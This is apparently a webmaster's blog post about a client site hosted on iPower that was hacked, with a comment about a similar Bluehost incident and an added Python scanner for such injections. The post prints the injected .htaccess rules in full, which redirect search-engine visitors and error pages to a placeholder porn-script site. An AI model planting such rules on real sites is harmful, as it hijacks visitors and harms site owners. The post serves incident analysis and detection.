iPower Hosted Site Hacked with .htaccess Modification

You can bet I will be posting this on Web Hosting Talk later. I already do not like iPower as a host. They suck, simply put. One of our last sites on iPower, one that was not on our iPower reseller, had been the target of a rather malicious and nasty .htaccess hack.

Not only is it irritating that the site got hacked and iPower did not notice or inform us, but when we called to tell them, they did not sound one bit alert to the seriousness of the issue. Really bad host.

When asked if they could look into the log files, as I knew the exact date and time it happened, they said that would not lead to much. He would not even transfer me to a Tier 2 tech. I did not push the matter, as I was about to wring his neck. I had already fixed the problem and I could tell the tech was not concerned at all about the matter.

As a matter of fact, he said a "hack" usually happens when a new or old web guy is involved. Well, I work for the old web guy and I am the new web guy, so I don't think so buddy.

This was a genius little hack; some script kiddie must be so proud. They used RewriteCond statements in the .htaccess file to redirect all search traffic from about 20 different search engines to a porn site script that sent you to a random site, oh, and 301 redirects to boot. There were also ErrorDocument scripts as well.

Once I looked into the matter the first thing I noticed was the Index and the .htaccess files were modified on April 11. That means the site has been like this for six bleeping days.

The most shocking thing to note here is that "this is not the first time this has happened to one of my client sites," as I am told by a coworker. HUH?

Needless to say, I changed the password on the account and am moving them to our new reseller on Liquid Web. Hit the jump if you are interested in the code from the little hack.

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://xxx-script-site-deleted.com/ [R=301,L]

ErrorDocument 401 http://xxx-script-site-deleted.com/
ErrorDocument 403 http://xxx-script-site-deleted.com/
ErrorDocument 404 http://xxx-script-site-deleted.com/
ErrorDocument 500 http://xxx-script-site-deleted.com/
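
A defender-side check for the pattern shown above, as an added example that is not part of the original post: it flags a RewriteRule that sends visitors to an outside host when one of its conditions tests HTTP_REFERER, and any ErrorDocument that points at an outside URL. The function name `scan_htaccess`, the `own_hosts` parameter and the host `redirect.example.invalid` are assumptions made for this example, and the sample input is constructed.

```python
from urllib.parse import urlparse

# Constructed sample modeled on the injected rules above (placeholder host),
# followed by two ordinary directives that must not be flagged.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*
RewriteRule ^(.*)$ http://redirect.example.invalid/ [R=301,L]
ErrorDocument 404 http://redirect.example.invalid/
ErrorDocument 403 /errors/403.html
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php [L]
"""

def _external(target, own_hosts):
    # Only absolute URLs have a hostname; local paths and "-" return None.
    host = urlparse(target).hostname
    return host is not None and host.lower() not in own_hosts

def scan_htaccess(text, own_hosts=()):
    """Return (line_no, reason, line) findings for redirect-injection patterns."""
    own = {h.lower() for h in own_hosts}
    findings = []
    referer_cond = False  # a pending RewriteCond tests HTTP_REFERER
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        target = parts[2] if len(parts) > 2 else ""
        if directive == "rewritecond":
            if len(parts) > 1 and "http_referer" in parts[1].lower():
                referer_cond = True
        elif directive == "rewriterule":
            if referer_cond and _external(target, own):
                findings.append((no, "referer-conditioned redirect to external host", line))
            referer_cond = False  # conditions bind only to the next RewriteRule
        elif directive == "errordocument" and _external(target, own):
            findings.append((no, "ErrorDocument points to external URL", line))
    return findings

if __name__ == "__main__":
    for no, reason, line in scan_htaccess(SAMPLE, own_hosts={"www.example.com"}):
        print(f"line {no}: {reason}: {line}")
```

Running it on a schedule against every .htaccess under the document root, with the site's own hostnames in `own_hosts`, would surface a change like the April 11 one without waiting for someone to arrive from a search engine.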


Comments (2)

Tim:

Ever find the logs? We had something similar on Bluehost where all our HTML files were deleted except for a new index.htm with some propaganda. Bluehost also refused to find raw logs for me to help track it down but we're still trying. Seems like it must be either a compromised password or some kind of root-level hack, which is what we want to rule out.
